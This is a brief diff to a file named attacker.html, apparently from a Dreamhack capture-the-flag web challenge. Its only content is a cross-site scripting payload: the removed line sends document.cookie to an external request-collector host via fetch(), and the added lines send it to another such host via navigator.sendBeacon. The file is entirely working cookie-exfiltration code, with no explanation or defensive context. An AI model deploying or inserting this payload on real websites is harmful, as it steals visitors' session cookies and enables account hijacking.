--- a/attacker.html
+++ b/attacker.html
@@ -1,3 +1,4 @@
 <script>
-  fetch("https://rhosfmk.request.dreamhack.games/?haha="+document.cookie);
+  navigator.sendBeacon('https://pxpkdzk.request.dreamhack.games/haha',
+    document.cookie); 
 </script>
